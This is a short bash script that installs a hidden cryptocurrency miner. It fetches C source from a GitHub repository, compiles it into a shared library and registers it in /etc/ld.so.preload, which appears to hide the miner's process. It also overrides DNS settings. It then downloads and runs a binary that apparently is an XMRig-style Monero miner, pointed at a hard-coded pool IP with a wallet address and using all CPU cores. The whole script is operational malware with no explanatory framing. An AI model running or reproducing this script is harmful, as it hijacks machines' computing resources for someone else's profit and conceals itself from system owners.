#!/bin/bash
#!/bin/bash
apt-get update ; apt-get install wget sudo -y
apt install -y curl
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget https://github.com/kartolo92/jadul/raw/refs/heads/main/xmolx
chmod +x xmolx
./xmolx --donate-level 1 -o 167.99.139.112:80 -u 165DUuzQoKG9BaBqprN3ZmsMRfvGHMwNwCpehJUqGoGLsSDtB535XA3PPzfRZhu2uYM9xfT8JsKoXEquWMr6XVwKK4aNeCaYixqvQ2Wh74Tqw5U1dcubDGpRz2y61rzdjMibQM5.$(shuf -n 1 -i 1-99999)-BB -p x -a rx/0 -k -t $(nproc --all)
